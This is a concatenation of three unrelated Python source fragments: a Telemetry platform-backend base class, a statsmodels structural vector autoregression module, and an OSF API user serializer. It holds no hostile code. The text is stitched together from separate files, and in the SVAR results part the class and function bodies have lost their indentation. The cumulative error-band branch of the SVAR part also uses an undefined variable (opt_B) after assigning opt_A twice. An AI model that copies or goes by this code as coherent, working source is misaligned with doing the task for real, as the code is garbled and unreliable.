    used for the host device which telemetry is running on."""
    return False

  @classmethod
  def SupportsDevice(cls, device):
    """Returns whether this platform backend supports initialization from
    the device."""
    return False

  @classmethod
  def CreatePlatformForDevice(cls, device, finder_options):
    raise NotImplementedError

  def SetPlatform(self, platform):
    # Fix: identity comparison with None (was `self._platform == None`).
    assert self._platform is None
    self._platform = platform

  @property
  def platform(self):
    return self._platform

  @property
  def is_host_platform(self):
    return self._platform.is_host_platform

  @property
  def running_browser_backends(self):
    return list(self._running_browser_backends)

  @property
  def network_controller_backend(self):
    return self._network_controller_backend

  @property
  def tracing_controller_backend(self):
    return self._tracing_controller_backend

  @property
  def forwarder_factory(self):
    # Created lazily; the do-nothing factory is a safe host default.
    if not self._forwarder_factory:
      self._forwarder_factory = do_nothing_forwarder.DoNothingForwarderFactory()
    return self._forwarder_factory

  def GetRemotePort(self, port):
    return port

  def DidCreateBrowser(self, browser, browser_backend):
    browser_options = browser_backend.browser_options
    self.SetFullPerformanceModeEnabled(browser_options.full_performance_mode)

    # TODO(slamm): Remove this call when replay browser_backend dependencies
    # get moved to platform. https://crbug.com/423962
    self._network_controller_backend.UpdateReplay(browser_backend)

  def DidStartBrowser(self, browser, browser_backend):
    assert browser not in self._running_browser_backends
    self._running_browser_backends.add(browser_backend)

  def WillCloseBrowser(self, browser, browser_backend):
    # TODO(slamm): Move this call when replay's life cycle is no longer
    # tied to the browser. https://crbug.com/424777
    self._network_controller_backend.StopReplay()

    is_last_browser = len(self._running_browser_backends) <= 1
    if is_last_browser:
      self.SetFullPerformanceModeEnabled(False)

    self._running_browser_backends.discard(browser_backend)

  @property
  def wpr_http_device_port(self):
    return self._network_controller_backend.wpr_http_device_port

  @property
  def wpr_https_device_port(self):
    return self._network_controller_backend.wpr_https_device_port

  def IsDisplayTracingSupported(self):
    return False

  def StartDisplayTracing(self):
    """Start gathering a trace with frame timestamps close to physical
    display."""
    raise NotImplementedError()

  def StopDisplayTracing(self):
    """Stop gathering a trace with frame timestamps close to physical display.

    Returns a raw tracing events that contains the timestamps of physical
    display.
    """
    raise NotImplementedError()

  def SetFullPerformanceModeEnabled(self, enabled):
    pass

  def CanMonitorThermalThrottling(self):
    return False

  def IsThermallyThrottled(self):
    raise NotImplementedError()

  def HasBeenThermallyThrottled(self):
    raise NotImplementedError()

  def GetSystemCommitCharge(self):
    raise NotImplementedError()

  def GetSystemTotalPhysicalMemory(self):
    raise NotImplementedError()

  def GetCpuStats(self, pid):
    return {}

  def GetCpuTimestamp(self):
    return {}

  def PurgeUnpinnedMemory(self):
    pass

  def GetMemoryStats(self, pid):
    return {}

  def GetChildPids(self, pid):
    raise NotImplementedError()

  def GetCommandLine(self, pid):
    raise NotImplementedError()

  def GetDeviceTypeName(self):
    raise NotImplementedError()

  def GetArchName(self):
    raise NotImplementedError()

  def GetOSName(self):
    raise NotImplementedError()

  def GetOSVersionName(self):
    raise NotImplementedError()

  def CanFlushIndividualFilesFromSystemCache(self):
    raise NotImplementedError()

  def FlushEntireSystemCache(self):
    raise NotImplementedError()

  def FlushSystemCacheForDirectory(self, directory):
    raise NotImplementedError()

  def FlushDnsCache(self):
    pass

  def LaunchApplication(
      self, application, parameters=None, elevate_privilege=False):
    raise NotImplementedError()

  def IsApplicationRunning(self, application):
    raise NotImplementedError()

  def CanLaunchApplication(self, application):
    return False

  def InstallApplication(self, application):
    raise NotImplementedError()

  def CanCaptureVideo(self):
    return False

  def StartVideoCapture(self, min_bitrate_mbps):
    raise NotImplementedError()

  @property
  def is_video_capture_running(self):
    return False

  def StopVideoCapture(self):
    raise NotImplementedError()

  def CanMonitorPower(self):
    return False

  def CanMeasurePerApplicationPower(self):
    return False

  def StartMonitoringPower(self, browser):
    raise NotImplementedError()

  def StopMonitoringPower(self):
    raise NotImplementedError()

  def CanMonitorNetworkData(self):
    return False

  def GetNetworkData(self, browser):
    raise NotImplementedError()

  def ReadMsr(self, msr_number, start=0, length=64):
    """Read a CPU model-specific register (MSR).

    Which MSRs are available depends on the CPU model.
    On systems with multiple CPUs, this function may run on any CPU.

    Args:
      msr_number: The number of the register to read.
      start: The least significant bit to read, zero-indexed.
          (Said another way, the number of bits to right-shift the MSR value.)
      length: The number of bits to read. MSRs are 64 bits, even on 32-bit
          CPUs.
    """
    raise NotImplementedError()

  @property
  def wpr_ca_cert_path(self):
    return None

  def CanTakeScreenshot(self):
    return False

  def TakeScreenshot(self, file_path):
    raise NotImplementedError

  def IsCooperativeShutdownSupported(self):
    """Indicates whether CooperativelyShutdown, below, is supported.
    It is not necessary to implement it on all platforms."""
    return False

  def CooperativelyShutdown(self, proc, app_name):
    """Cooperatively shut down the given process from subprocess.Popen.

    Currently this is only implemented on Windows. See
    crbug.com/424024 for background on why it was added.

    Args:
      proc: a process object returned from subprocess.Popen.
      app_name: on Windows, is the prefix of the application's window
          class name that should be searched for. This helps ensure
          that only the application's windows are closed.

    Returns True if it is believed the attempt succeeded.
    """
    raise NotImplementedError()

  def PathExists(self, path, timeout=None, retries=None):
    """Tests whether the given path exists on the target platform.

    Args:
      path: path in request.
      timeout: timeout.
      retries: num of retries.
    Return:
      Whether the path exists on the target platform.
    """
    raise NotImplementedError()
| |
"""
Vector Autoregression (VAR) processes
References
----------
Lutkepohl (2005) New Introduction to Multiple Time Series Analysis
"""
from __future__ import print_function, division
from statsmodels.compat.python import range
import numpy as np
import numpy.linalg as npl
from numpy.linalg import slogdet
from statsmodels.tools.numdiff import (approx_hess, approx_fprime)
from statsmodels.tools.decorators import cache_readonly
from statsmodels.tsa.vector_ar.irf import IRAnalysis
from statsmodels.tsa.vector_ar.var_model import VARProcess, \
VARResults
import statsmodels.tsa.vector_ar.util as util
import statsmodels.tsa.base.tsa_model as tsbase
from statsmodels.compat.numpy import np_matrix_rank
mat = np.array
def svar_ckerr(svar_type, A, B):
    """Check that the arrays required by the requested SVAR type exist.

    Raises ValueError when svar_type needs an A and/or B array that was
    not supplied.
    """
    if svar_type in ('A', 'AB') and A is None:
        raise ValueError('SVAR of type A or AB but A array not given.')
    if svar_type in ('B', 'AB') and B is None:
        raise ValueError('SVAR of type B or AB but B array not given.')
class SVAR(tsbase.TimeSeriesModel):
    r"""
    Fit VAR and then estimate structural components of A and B, defined:

    .. math:: A y_t = A_1 y_{t-1} + \ldots + A_p y_{t-p} + B \epsilon_t

    Parameters
    ----------
    endog : array-like
        2-d endogenous response variable (nobs x neqs).
    dates : array-like
        must match number of rows of endog
    svar_type : str
        "A" - estimate structural parameters of A matrix, B assumed = I
        "B" - estimate structural parameters of B matrix, A assumed = I
        "AB" - estimate structural parameters indicated in both A and B matrix
    A : array-like
        neqs x neqs with unknown parameters marked with 'E' for estimate
    B : array-like
        neqs x neqs with unknown parameters marked with 'E' for estimate

    References
    ----------
    Hamilton (1994) Time Series Analysis
    """

    def __init__(self, endog, svar_type, dates=None,
                 freq=None, A=None, B=None, missing='none'):
        super(SVAR, self).__init__(endog, None, dates, freq, missing=missing)
        self.y = self.endog  # keep alias for now
        self.neqs = self.endog.shape[1]

        types = ['A', 'B', 'AB']
        if svar_type not in types:
            raise ValueError('SVAR type not recognized, must be in '
                             + str(types))
        self.svar_type = svar_type

        svar_ckerr(svar_type, A, B)

        # Initialize A, B as identity when not given, and build boolean
        # masks marking the free ('E'/'e') structural parameters.
        if A is None:
            A = np.identity(self.neqs)
            self.A_mask = A_mask = np.zeros(A.shape, dtype=bool)
        else:
            A_mask = np.logical_or(A == 'E', A == 'e')
            self.A_mask = A_mask
        if B is None:
            B = np.identity(self.neqs)
            self.B_mask = B_mask = np.zeros(B.shape, dtype=bool)
        else:
            B_mask = np.logical_or(B == 'E', B == 'e')
            self.B_mask = B_mask

        # Convert A and B to numeric, with NaN marking the positions that
        # are to be estimated.
        # TODO: change this when masked support is better or with formula
        # integration
        Anum = np.zeros(A.shape, dtype=float)
        Anum[~A_mask] = A[~A_mask]
        Anum[A_mask] = np.nan
        self.A = Anum

        Bnum = np.zeros(B.shape, dtype=float)
        Bnum[~B_mask] = B[~B_mask]
        Bnum[B_mask] = np.nan
        self.B = Bnum

    def fit(self, A_guess=None, B_guess=None, maxlags=None, method='ols',
            ic=None, trend='c', verbose=False, s_method='mle',
            solver="bfgs", override=False, maxiter=500, maxfun=500):
        """
        Fit the SVAR model and solve for structural parameters

        Parameters
        ----------
        A_guess : array-like, optional
            A vector of starting values for all parameters to be estimated
            in A.
        B_guess : array-like, optional
            A vector of starting values for all parameters to be estimated
            in B.
        maxlags : int
            Maximum number of lags to check for order selection, defaults to
            12 * (nobs/100.)**(1./4), see select_order function
        method : {'ols'}
            Estimation method to use
        ic : {'aic', 'fpe', 'hqic', 'bic', None}
            Information criterion to use for VAR order selection.
            aic : Akaike
            fpe : Final prediction error
            hqic : Hannan-Quinn
            bic : Bayesian a.k.a. Schwarz
        verbose : bool, default False
            Print order selection output to the screen
        trend : str {"c", "ct", "ctt", "nc"}
            "c" - add constant
            "ct" - constant and trend
            "ctt" - constant, linear and quadratic trend
            "nc" - no constant, no trend
            Note that these are prepended to the columns of the dataset.
        s_method : {'mle'}
            Estimation method for structural parameters
        solver : {'nm', 'newton', 'bfgs', 'cg', 'ncg', 'powell'}
            Solution method
            See statsmodels.base for details
        override : bool, default False
            If True, returns estimates of A and B without checking
            order or rank condition
        maxiter : int, default 500
            Number of iterations to perform in solution method
        maxfun : int
            Number of function evaluations to perform

        Notes
        -----
        Lutkepohl pp. 146-153
        Hamilton pp. 324-336

        Returns
        -------
        est : SVARResults
        """
        lags = maxlags

        if ic is not None:
            selections = self.select_order(maxlags=maxlags, verbose=verbose)
            if ic not in selections:
                # ValueError instead of bare Exception; still caught by
                # callers handling Exception.
                raise ValueError("%s not recognized, must be among %s"
                                 % (ic, sorted(selections)))
            lags = selections[ic]
            if verbose:
                print('Using %d based on %s criterion' % (lags, ic))
        else:
            if lags is None:
                lags = 1

        self.nobs = len(self.endog) - lags

        # initialize starting parameters
        start_params = self._get_init_params(A_guess, B_guess)

        return self._estimate_svar(start_params, lags, trend=trend,
                                   solver=solver, override=override,
                                   maxiter=maxiter, maxfun=maxfun)

    def _get_init_params(self, A_guess, B_guess):
        """
        Return the given starting values, or .1 for every free parameter
        when none are given.
        """
        var_type = self.svar_type.lower()

        n_masked_a = self.A_mask.sum()
        if var_type in ['ab', 'a']:
            if A_guess is None:
                A_guess = np.array([.1] * n_masked_a)
            else:
                if len(A_guess) != n_masked_a:
                    msg = 'len(A_guess) = %s, there are %s parameters in A'
                    raise ValueError(msg % (len(A_guess), n_masked_a))
        else:
            A_guess = []

        n_masked_b = self.B_mask.sum()
        if var_type in ['ab', 'b']:
            if B_guess is None:
                B_guess = np.array([.1] * n_masked_b)
            else:
                if len(B_guess) != n_masked_b:
                    msg = 'len(B_guess) = %s, there are %s parameters in B'
                    raise ValueError(msg % (len(B_guess), n_masked_b))
        else:
            B_guess = []

        return np.r_[A_guess, B_guess]

    def _estimate_svar(self, start_params, lags, maxiter, maxfun,
                       trend='c', solver="nm", override=False):
        """
        Estimate the reduced-form VAR by OLS, then solve for A and B.

        lags : int
        trend : string or None
            As per above
        """
        k_trend = util.get_trendorder(trend)
        y = self.endog
        z = util.get_var_endog(y, lags, trend=trend, has_constant='raise')
        y_sample = y[lags:]

        # Lutkepohl p75, about 5x faster than stated formula.
        # rcond=-1 keeps the legacy lstsq cutoff behavior.
        var_params = np.linalg.lstsq(z, y_sample, rcond=-1)[0]
        resid = y_sample - np.dot(z, var_params)

        # Unbiased estimate of covariance matrix $\Sigma_u$ of the white
        # noise process $u$; equivalent definition
        # .. math:: \frac{1}{T - Kp - 1} Y^\prime (I_T - Z (Z^\prime Z)^{-1}
        # Z^\prime) Y
        # Ref: Lutkepohl p.75
        # df_resid right now is T - Kp - 1, which is a suggested correction
        avobs = len(y_sample)
        df_resid = avobs - (self.neqs * lags + k_trend)
        sse = np.dot(resid.T, resid)
        # TODO: should give users the option to use a dof correction or not
        omega = sse / df_resid
        self.sigma_u = omega

        A, B = self._solve_AB(start_params, override=override,
                              solver=solver,
                              maxiter=maxiter,
                              maxfun=maxfun)
        A_mask = self.A_mask
        B_mask = self.B_mask

        return SVARResults(y, z, var_params, omega, lags,
                           names=self.endog_names, trend=trend,
                           dates=self.data.dates, model=self,
                           A=A, B=B, A_mask=A_mask, B_mask=B_mask)

    def loglike(self, params):
        """
        Loglikelihood for SVAR model

        Notes
        -----
        This method assumes that the autoregressive parameters are
        first estimated, then likelihood with structural parameters
        is estimated
        """
        # TODO: this doesn't look robust if A or B is None
        A = self.A
        B = self.B
        A_mask = self.A_mask
        B_mask = self.B_mask
        A_len = len(A[A_mask])
        B_len = len(B[B_mask])

        # Fill the free positions with the candidate parameter values.
        if A is not None:
            A[A_mask] = params[:A_len]
        if B is not None:
            B[B_mask] = params[A_len:A_len + B_len]

        nobs = self.nobs
        neqs = self.neqs
        sigma_u = self.sigma_u

        W = np.dot(npl.inv(B), A)
        trc_in = np.dot(np.dot(W.T, W), sigma_u)
        sign, b_logdet = slogdet(B ** 2)  # numpy 1.4 compat
        b_slogdet = sign * b_logdet

        likl = -nobs / 2. * (neqs * np.log(2 * np.pi) -
                             np.log(npl.det(A) ** 2) + b_slogdet +
                             np.trace(trc_in))
        return likl

    def score(self, AB_mask):
        """
        Return the gradient of the loglike at AB_mask.

        Parameters
        ----------
        AB_mask : unknown values of A and B matrix concatenated

        Notes
        -----
        Return numerical gradient
        """
        loglike = self.loglike
        return approx_fprime(AB_mask, loglike, epsilon=1e-8)

    def hessian(self, AB_mask):
        """
        Returns numerical hessian.
        """
        loglike = self.loglike
        return approx_hess(AB_mask, loglike)

    def _solve_AB(self, start_params, maxiter, maxfun, override=False,
                  solver='bfgs'):
        """
        Solves for MLE estimate of structural parameters

        Parameters
        ----------
        override : bool, default False
            If True, returns estimates of A and B without checking
            order or rank condition
        solver : str or None, optional
            Solver to be used. The default is 'nm' (Nelder-Mead). Other
            choices are 'bfgs', 'newton' (Newton-Raphson), 'cg'
            conjugate, 'ncg' (non-conjugate gradient), and 'powell'.
        maxiter : int, optional
            The maximum number of iterations. Default is 500.
        maxfun : int, optional
            The maximum number of function evaluations.

        Returns
        -------
        A_solve, B_solve: ML solutions for A, B matrices
        """
        # TODO: this could stand a refactor
        A_mask = self.A_mask
        B_mask = self.B_mask
        A = self.A
        B = self.B

        A_len = len(A[A_mask])
        A[A_mask] = start_params[:A_len]
        B[B_mask] = start_params[A_len:]

        if not override:
            J = self._compute_J(A, B)
            self.check_order(J)
            self.check_rank(J)
        else:  # TODO: change to a warning?
            print("Order/rank conditions have not been checked")

        retvals = super(SVAR, self).fit(start_params=start_params,
                                        method=solver, maxiter=maxiter,
                                        maxfun=maxfun, ftol=1e-20,
                                        disp=0).params

        A[A_mask] = retvals[:A_len]
        B[B_mask] = retvals[A_len:]
        return A, B

    def _compute_J(self, A_solve, B_solve):
        """Jacobian used by the order/rank identification checks.

        The duplication matrix D_n is built following Magnus and Neudecker
        (1980), "The Elimination Matrix: Some Lemmas and Applications";
        the rest follows Hamilton (1994).
        """
        neqs = self.neqs
        sigma_u = self.sigma_u
        A_mask = self.A_mask
        B_mask = self.B_mask

        # Number of distinct elements of a symmetric neqs x neqs matrix.
        # Bug fix: the original used float shapes/indices
        # ((1.0/2)*neqs*(neqs+1)), which numpy rejects; neqs*(neqs+1) is
        # always even so integer division is exact.
        vech_len = neqs * (neqs + 1) // 2

        # Generate duplication matrix, see MN (1980) for notation.
        D_nT = np.zeros((vech_len, neqs ** 2))
        for j in range(neqs):
            for i in range(j, neqs):
                u = np.zeros((vech_len, 1))
                u[j * neqs + i - j * (j + 1) // 2] = 1
                Tij = np.zeros((neqs, neqs))
                Tij[i, j] = 1
                Tij[j, i] = 1
                D_nT = D_nT + np.dot(u, (Tij.ravel('F')[:, None]).T)
        D_n = D_nT.T
        D_pl = npl.pinv(D_n)

        # Selection matrices S_B, S_D pick out the free parameters.
        S_B = np.zeros((neqs ** 2, len(A_solve[A_mask])))
        S_D = np.zeros((neqs ** 2, len(B_solve[B_mask])))

        # Bug fix: use != / truthiness instead of `is not 0` / `== True`.
        j = 0
        j_d = 0
        if len(A_solve[A_mask]) != 0:
            A_vec = np.ravel(A_mask, order='F')
            for k in range(neqs ** 2):
                if A_vec[k]:
                    S_B[k, j] = -1
                    j += 1
        if len(B_solve[B_mask]) != 0:
            B_vec = np.ravel(B_mask, order='F')
            for k in range(neqs ** 2):
                if B_vec[k]:
                    S_D[k, j_d] = 1
                    j_d += 1

        # Now compute J.
        invA = npl.inv(A_solve)
        J_p1i = np.dot(np.dot(D_pl, np.kron(sigma_u, invA)), S_B)
        J_p1 = -2.0 * J_p1i
        J_p2 = np.dot(np.dot(D_pl, np.kron(invA, invA)), S_D)
        J = np.append(J_p1, J_p2, axis=1)
        return J

    def check_order(self, J):
        """Raise ValueError when the order condition fails (J is wide)."""
        if np.size(J, axis=0) < np.size(J, axis=1):
            raise ValueError("Order condition not met: "
                             "solution may not be unique")

    def check_rank(self, J):
        """Raise ValueError when J does not have full column rank."""
        rank = np_matrix_rank(J)
        if rank < np.size(J, axis=1):
            raise ValueError("Rank condition not met: "
                             "solution may not be unique.")
class SVARProcess(VARProcess):
    """
    Class represents a known SVAR(p) process

    Parameters
    ----------
    coefs : ndarray (p x k x k)
    intercept : ndarray (length k)
    sigma_u : ndarray (k x k)
    names : sequence (length k)
    A : neqs x neqs np.ndarray with unknown parameters marked with 'E'
    A_mask : neqs x neqs mask array with known parameters masked
    B : neqs x neqs np.ndarray with unknown parameters marked with 'E'
    B_mask : neqs x neqs mask array with known parameters masked
    """

    def __init__(self, coefs, intercept, sigma_u, A_solve, B_solve,
                 names=None):
        self.k_ar = len(coefs)
        self.neqs = coefs.shape[1]
        self.coefs = coefs
        self.intercept = intercept
        self.sigma_u = sigma_u
        self.A_solve = A_solve
        self.B_solve = B_solve
        self.names = names

    def orth_ma_rep(self, maxn=10, P=None):
        """Orthogonalized MA representation is unavailable for SVAR."""
        raise NotImplementedError

    def svar_ma_rep(self, maxn=10, P=None):
        """
        Compute structural MA coefficient matrices using the MLE of A, B.
        """
        if P is None:
            # Structural shocks enter through P = A^{-1} B.
            P = np.dot(npl.inv(self.A_solve), self.B_solve)
        return mat([np.dot(phi, P) for phi in self.ma_rep(maxn=maxn)])
class SVARResults(SVARProcess, VARResults):
"""
Estimate VAR(p) process with fixed number of lags
Parameters
----------
endog : array
endog_lagged : array
params : array
sigma_u : array
lag_order : int
model : VAR model instance
trend : str {'nc', 'c', 'ct'}
names : array-like
List of names of the endogenous variables in order of appearance in `endog`.
dates
Returns
-------
**Attributes**
aic
bic
bse
coefs : ndarray (p x K x K)
Estimated A_i matrices, A_i = coefs[i-1]
cov_params
dates
detomega
df_model : int
df_resid : int
endog
endog_lagged
fittedvalues
fpe
intercept
info_criteria
k_ar : int
k_trend : int
llf
model
names
neqs : int
Number of variables (equations)
nobs : int
n_totobs : int
params
k_ar : int
Order of VAR process
params : ndarray (Kp + 1) x K
A_i matrices and intercept in stacked form [int A_1 ... A_p]
pvalue
names : list
variables names
resid
sigma_u : ndarray (K x K)
Estimate of white noise process variance Var[u_t]
sigma_u_mle
stderr
    trendorder
tvalues
y :
ys_lagged
"""
_model_type = 'SVAR'
    def __init__(self, endog, endog_lagged, params, sigma_u, lag_order,
                 A=None, B=None, A_mask=None, B_mask=None, model=None,
                 trend='c', names=None, dates=None):
        """Store estimation results and unstack the VAR parameter array.

        NOTE(review): assumes `params` is in stacked form
        [trend A_1 ... A_p] with shape ((k_trend + neqs*lag_order) x neqs)
        — confirm against SVAR._estimate_svar.
        """
        self.model = model
        self.y = self.endog = endog  # keep alias for now
        self.ys_lagged = self.endog_lagged = endog_lagged  # keep alias for now
        self.dates = dates

        self.n_totobs, self.neqs = self.y.shape
        # Observations actually usable after losing lag_order presample rows.
        self.nobs = self.n_totobs - lag_order
        k_trend = util.get_trendorder(trend)
        if k_trend > 0:  # make this the polynomial trend order
            trendorder = k_trend - 1
        else:
            trendorder = None
        self.k_trend = k_trend
        self.trendorder = trendorder

        self.exog_names = util.make_lag_names(names, lag_order, k_trend)
        self.params = params
        self.sigma_u = sigma_u

        # Drop the trend rows, then reshape to (lags, neqs, neqs).
        reshaped = self.params[self.k_trend:]
        reshaped = reshaped.reshape((lag_order, self.neqs, self.neqs))

        # Each coefficient matrix needs to be transposed (swapaxes below).
        intercept = self.params[0]
        coefs = reshaped.swapaxes(1, 2).copy()

        # SVAR components
        # TODO: if you define these here, you don't also have to define
        # them in SVARProcess, but I left them for now -ss
        self.A = A
        self.B = B
        self.A_mask = A_mask
        self.B_mask = B_mask

        super(SVARResults, self).__init__(coefs, intercept, sigma_u, A,
                                          B, names=names)
def irf(self, periods=10, var_order=None):
"""
Analyze structural impulse responses to shocks in system
Parameters
----------
periods : int
Returns
-------
irf : IRAnalysis
"""
A = self.A
B= self.B
P = np.dot(npl.inv(A), B)
return IRAnalysis(self, P=P, periods=periods, svar=True)
def sirf_errband_mc(self, orth=False, repl=1000, T=10,
signif=0.05, seed=None, burn=100, cum=False):
"""
Compute Monte Carlo integrated error bands assuming normally
distributed for impulse response functions
Parameters
----------
orth: bool, default False
Compute orthoganalized impulse response error bands
repl: int
number of Monte Carlo replications to perform
T: int, default 10
number of impulse response periods
signif: float (0 < signif <1)
Significance level for error bars, defaults to 95% CI
seed: int
np.random.seed for replications
burn: int
number of initial observations to discard for simulation
cum: bool, default False
produce cumulative irf error bands
Notes
-----
Lutkepohl (2005) Appendix D
Returns
-------
Tuple of lower and upper arrays of ma_rep monte carlo standard errors
"""
neqs = self.neqs
mean = self.mean()
k_ar = self.k_ar
coefs = self.coefs
sigma_u = self.sigma_u
intercept = self.intercept
df_model = self.df_model
nobs = self.nobs
ma_coll = np.zeros((repl, T+1, neqs, neqs))
A = self.A
B = self.B
A_mask = self.A_mask
B_mask = self.B_mask
A_pass = np.zeros(A.shape, dtype='|S1')
B_pass = np.zeros(B.shape, dtype='|S1')
A_pass[~A_mask] = A[~A_mask]
B_pass[~B_mask] = B[~B_mask]
A_pass[A_mask] = 'E'
B_pass[B_mask] = 'E'
if A_mask.sum() == 0:
s_type = 'B'
elif B_mask.sum() == 0:
s_type = 'A'
else:
s_type = 'AB'
g_list = []
for i in range(repl):
#discard first hundred to correct for starting bias
sim = util.varsim(coefs, intercept, sigma_u,
steps=nobs+burn)
sim = sim[burn:]
if cum == True:
if i < 10:
sol = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar)
g_list.append(np.append(sol.A[sol.A_mask].\
tolist(),
sol.B[sol.B_mask].\
tolist()))
ma_coll[i] = sol.svar_ma_rep(maxn=T).cumsum(axis=0)
elif i >= 10:
if i == 10:
mean_AB = np.mean(g_list, axis = 0)
split = len(A_pass[A_mask])
opt_A = mean_AB[:split]
opt_A = mean_AB[split:]
ma_coll[i] = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar,\
A_guess=opt_A, B_guess=opt_B).\
svar_ma_rep(maxn=T).cumsum(axis=0)
elif cum == False:
if i < 10:
sol = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar)
g_list.append(np.append(sol.A[A_mask].tolist(),
sol.B[B_mask].tolist()))
ma_coll[i] = sol.svar_ma_rep(maxn=T)
elif i >= 10:
if i == 10:
mean_AB = np.mean(g_list, axis = 0)
split = len(A[A_mask])
opt_A = mean_AB[:split]
opt_B = mean_AB[split:]
ma_coll[i] = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar,\
A_guess = opt_A, B_guess = opt_B).\
svar_ma_rep(maxn=T)
ma_sort = np.sort(ma_coll, axis=0) #sort to get quantiles
index = round(signif/2*repl)-1,round((1-signif/2)*repl)-1
lower = ma_sort[index[0],:, :, :]
upper = ma_sort[index[1],:, :, :]
return lower, upper
| |
from guardian.models import GroupObjectPermission
from django.utils import timezone
from rest_framework import serializers as ser
from api.base.exceptions import InvalidModelValueError
from api.base.serializers import (
BaseAPISerializer, JSONAPISerializer, JSONAPIRelationshipSerializer,
VersionedDateTimeField, HideIfDisabled, IDField,
Link, LinksField, ListDictField, TypeField, RelationshipField, JSONAPIListField,
WaterbutlerLink, ShowIfCurrentUser
)
from api.base.utils import absolute_reverse, get_user_auth, waterbutler_api_url_for
from api.files.serializers import QuickFilesSerializer
from osf.exceptions import ValidationValueError, ValidationError
from osf.models import OSFUser, QuickFilesNode
from api.users.schemas.utils import validate_user_json
class QuickFilesRelationshipField(RelationshipField):
    """Relationship field that augments the standard relationship links with
    waterbutler upload/download endpoints for the user's quickfiles node."""

    def to_representation(self, value):
        links = super(QuickFilesRelationshipField, self).to_representation(value)
        # Resolve the guid of the user's (single) QuickFilesNode.
        quickfiles_guid = value.nodes_created.filter(
            type=QuickFilesNode._typedmodels_type
        ).values_list('guids___id', flat=True).get()
        base_url = waterbutler_api_url_for(quickfiles_guid, 'osfstorage')
        links['links'].update({
            'upload': {'href': base_url, 'meta': {}},
            'download': {'href': '{}?zip='.format(base_url), 'meta': {}},
        })
        return links
class UserSerializer(JSONAPISerializer):
    """JSON-API serializer for OSF users.

    Exposes profile fields plus relationship links to the user's nodes,
    quickfiles, registrations, institutions and preprints.
    """
    filterable_fields = frozenset([
        'full_name',
        'given_name',
        'middle_names',
        'family_name',
        'id'
    ])
    writeable_method_fields = frozenset([
        'accepted_terms_of_service',
    ])
    non_anonymized_fields = ['type']

    id = IDField(source='_id', read_only=True)
    type = TypeField()
    full_name = ser.CharField(source='fullname', required=True, label='Full name', help_text='Display name used in the general user interface', max_length=186)
    given_name = ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations')
    middle_names = ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations')
    family_name = ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations')
    suffix = HideIfDisabled(ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations'))
    date_registered = HideIfDisabled(VersionedDateTimeField(read_only=True))
    active = HideIfDisabled(ser.BooleanField(read_only=True, source='is_active'))
    # BUG FIX: help_text was missing the closing quote around 'Etc/UTC'.
    timezone = HideIfDisabled(ser.CharField(required=False, help_text="User's timezone, e.g. 'Etc/UTC'"))
    locale = HideIfDisabled(ser.CharField(required=False, help_text="User's locale, e.g. 'en_US'"))
    social = ListDictField(required=False)
    employment = JSONAPIListField(required=False, source='jobs')
    education = JSONAPIListField(required=False, source='schools')
    can_view_reviews = ShowIfCurrentUser(ser.SerializerMethodField(help_text='Whether the current user has the `view_submissions` permission to ANY reviews provider.'))
    accepted_terms_of_service = ShowIfCurrentUser(ser.SerializerMethodField())

    links = HideIfDisabled(LinksField(
        {
            'html': 'absolute_url',
            'profile_image': 'profile_image_url',
        }
    ))

    nodes = HideIfDisabled(RelationshipField(
        related_view='users:user-nodes',
        related_view_kwargs={'user_id': '<_id>'},
        related_meta={'projects_in_common': 'get_projects_in_common'},
    ))

    quickfiles = HideIfDisabled(QuickFilesRelationshipField(
        related_view='users:user-quickfiles',
        related_view_kwargs={'user_id': '<_id>'},
    ))

    registrations = HideIfDisabled(RelationshipField(
        related_view='users:user-registrations',
        related_view_kwargs={'user_id': '<_id>'},
    ))

    institutions = HideIfDisabled(RelationshipField(
        related_view='users:user-institutions',
        related_view_kwargs={'user_id': '<_id>'},
        self_view='users:user-institutions-relationship',
        self_view_kwargs={'user_id': '<_id>'},
    ))

    preprints = HideIfDisabled(RelationshipField(
        related_view='users:user-preprints',
        related_view_kwargs={'user_id': '<_id>'},
    ))

    class Meta:
        type_ = 'users'

    def get_projects_in_common(self, obj):
        # Number of projects shared between the target user and the requester.
        user = get_user_auth(self.context['request']).user
        if obj == user:
            return user.contributor_to.count()
        return obj.n_projects_in_common(user)

    def absolute_url(self, obj):
        if obj is not None:
            return obj.absolute_url
        return None

    def get_absolute_url(self, obj):
        return absolute_reverse('users:user-detail', kwargs={
            'user_id': obj._id,
            'version': self.context['request'].parser_context['kwargs']['version']
        })

    def get_can_view_reviews(self, obj):
        group_qs = GroupObjectPermission.objects.filter(group__user=obj, permission__codename='view_submissions')
        # BUG FIX: the second operand previously returned a bare QuerySet
        # instead of a boolean; call .exists() so the field is always a bool.
        return group_qs.exists() or obj.userobjectpermission_set.filter(permission__codename='view_submissions').exists()

    def get_accepted_terms_of_service(self, obj):
        return bool(obj.accepted_terms_of_service)

    def profile_image_url(self, user):
        size = self.context['request'].query_params.get('profile_image_size')
        return user.profile_image_url(size=size)

    def validate_employment(self, value):
        validate_user_json(value, 'employment-schema.json')
        return value

    def validate_education(self, value):
        validate_user_json(value, 'education-schema.json')
        return value

    def update(self, instance, validated_data):
        assert isinstance(instance, OSFUser), 'instance must be a User'
        for attr, value in validated_data.items():
            if 'social' == attr:
                for key, val in value.items():
                    # currently only profileWebsites are a list, the rest of
                    # the social key only has one value
                    if key == 'profileWebsites':
                        instance.social[key] = val
                    else:
                        if len(val) > 1:
                            raise InvalidModelValueError(
                                detail='{} only accepts a list of one single value'.format(key)
                            )
                        instance.social[key] = val[0]
            elif 'accepted_terms_of_service' == attr:
                # Only stamp the acceptance time once; never un-accept.
                if value and not instance.accepted_terms_of_service:
                    instance.accepted_terms_of_service = timezone.now()
            else:
                setattr(instance, attr, value)
        try:
            instance.save()
        except ValidationValueError as e:
            raise InvalidModelValueError(detail=e.message)
        except ValidationError as e:
            raise InvalidModelValueError(e)
        return instance
class UserAddonSettingsSerializer(JSONAPISerializer):
    """
    Serializes a user addon's settings and its connected external accounts.

    (The previous docstring -- "Overrides UserSerializer to make id required"
    -- appeared to be copy-pasted from UserDetailSerializer; this class is a
    plain JSONAPISerializer and its ``id`` is read-only.)
    """
